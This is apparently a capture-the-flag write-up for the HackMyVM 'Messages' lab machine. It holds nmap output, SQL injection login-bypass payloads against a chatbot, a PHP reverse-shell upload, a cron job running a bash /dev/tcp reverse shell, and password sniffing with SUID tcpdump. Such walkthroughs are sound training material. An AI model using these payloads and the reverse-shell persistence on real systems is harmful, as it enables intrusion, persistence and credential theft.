HackMyVM - Messages

 

Messages is a medium difficulty machine that should make you think a little...
As it is a medium machine I will assume a little knowldge and just mention the relevant points rather than detail the simple bits.

Find it

┌──(kali㉿kali)-[~/messages]

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit

[sudo] password for kali: 

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 10.0.0.1        08:00:27:d5:3a:9b      1      60  PCS Systemtechnik GmbH

 10.0.0.136      08:00:27:b9:c9:3f      1      60  PCS Systemtechnik GmbH

-- Active scan completed, 2 Hosts found.

Scan it

└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.136

Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 11:50 EST

Nmap scan report for 10.0.0.136

Host is up (0.00063s latency).

Not shown: 65525 filtered ports

PORT    STATE SERVICE  VERSION

22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5 (protocol 2.0)

| ssh-hostkey: 

|   3072 3f:95:7f:d8:b0:55:f2:55:b0:54:8f:e3:02:01:ac:61 (RSA)

|   256 4c:93:71:5c:f7:45:4a:24:d0:9e:f8:d5:19:64:ee:9a (ECDSA)

|_  256 32:80:9c:9b:8c:b3:c1:8c:9b:51:08:25:32:9c:d6:e4 (ED25519)

25/tcp  open  smtp     Postfix smtpd

|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\x0D

80/tcp  open  http     nginx

|_http-title: Did not follow redirect to https://10.0.0.136/

110/tcp open  pop3     Dovecot pop3d

|_pop3-capabilities: STLS AUTH-RESP-CODE UIDL SASL RESP-CODES CAPA TOP PIPELINING

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

143/tcp open  imap     Dovecot imapd

|_imap-capabilities: LOGIN-REFERRALS IMAP4rev1 have LOGINDISABLEDA0001 ENABLE LITERAL+ capabilities ID IDLE OK post-login Pre-login listed SASL-IR STARTTLS more

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

443/tcp open  ssl/http nginx

| http-robots.txt: 1 disallowed entry 

|_/

|_http-title: Welcome to the Landing Page

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

465/tcp open  ssl/smtp Postfix smtpd

|_smtp-commands: mx.messages.hmv, PIPELINING, SIZE 15728640, ETRN, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

|_ssl-date: TLS randomness does not represent time

587/tcp open  smtp     Postfix smtpd

|_smtp-commands: mx.messages.hmv, PIPELINING, SIZE 15728640, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

|_ssl-date: TLS randomness does not represent time

993/tcp open  imaps?

|_imap-capabilities: LOGIN-REFERRALS IMAP4rev1 have ENABLE AUTH=LOGINA0001 LITERAL+ AUTH=PLAIN ID IDLE Pre-login post-login capabilities listed SASL-IR OK more

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

995/tcp open  pop3s?

|_pop3-capabilities: SASL(PLAIN LOGIN) AUTH-RESP-CODE UIDL USER RESP-CODES CAPA TOP PIPELINING

| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN

| Not valid before: 2022-01-26T18:05:23

|_Not valid after:  2032-01-24T18:05:23

Service Info: Hosts: -mx.messages.hmv,  mx.messages.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 109.08 seconds

So there are a few ports available,
Mostly messaging related (SMTP, POP3, IMAP etc)
ssh is restricted to keys only so lets look at the webpages first.

RCE

Webmail wont be much use without any credentials, lets look at the chatbot.

Searching for Chatbot v1.0 there are vulnerabilities listed.

https://www.exploit-db.com/exploits/50673 https://www.exploit-db.com/exploits/50672
Looking at the records on exploits-db.com also links to the download link.
There are multiple ways to exploit this - either by:
a. trying to replace an icon with a malicious php script
b. exploiting the SQL injection vulnerability.
c. looking at the install documentation for the default credentials.

the SQL injection method is actually the easiest to bypass the admin login.
by setting the username to: admin'-- -
and anything as a password you can just login:
If the username was unknown or had been changed for security... then
admin' or username in (select username from users) LIMIT 1;-- -

If you were to look at the source code you would see:

"SELECT * from users where username = '$username' and password = md5('$password') "
So by closing the quote early and using "-- -" the remainder of the line is effectively commented out:

"SELECT * from users where username = '$username'-- -' and password = md5('$password') "

From the Admin settings page there is not restriction on uploading images so a reverseshell.php file can be uploaded - for example the one from https://pentestmonkey.net/tools/web-shells/php-reverse-shell

First setting up a netcat listener on the attck box.

Unfortunately it will quickly become obvious that there is something happening as the connection is terminated after 60 seconds. This appears to be from the webmail settings to prevent long running queries...

Annoying but not too much trouble to resolve:

A simple method is to just have cron call you back on a new connection:

echo '#!/bin/bash'>/dev/shm/test.sh

echo 'bash -i >& /dev/tcp/10.0.0.10/5555 0>&1'>>/dev/shm/test.sh

chmod 777 /dev/shm/test.sh

echo "* * * * * /dev/shm/test.sh"|crontab -

Now we have a more stable connection we can have a look around.

Escalate to User

At some point in looking around it is worth seeing if there is any other user credentials in the chatbot database... 

/var/www/html/chatbot/initialze.php contains:

if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");

if(!defined('DB_USERNAME')) define('DB_USERNAME',"chatbot");

if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"chatbot");

if(!defined('DB_NAME')) define('DB_NAME',"chatbot");

Looking in SQL there isnt anything interesting in the chatbot directory however the account has rights to other databases...

save the hashes to kali and attacking them with john

So we now have credentials to login to webmail:

And we find a private key for Ruby and a mail from root that the POP3 script is working now ?

Escalate to Root

From the emails and notes it is believed that root is polling a POP3 mailbox every minute, running pspy64 also shows UID=0 running /usr/bin/python3 /root/checkmail.py every minute.

Running:
find / -perm -4000 -exec ls -al {} \; 2>/dev/null 

-rwsr-s--- 1 root ruby 1261512 Jan 15  2021 /usr/bin/tcpdump

se we have suid rights to run tcpdump.

It should be possible to just packet capture the logon and read the password.

Just need to su - as root and thats it.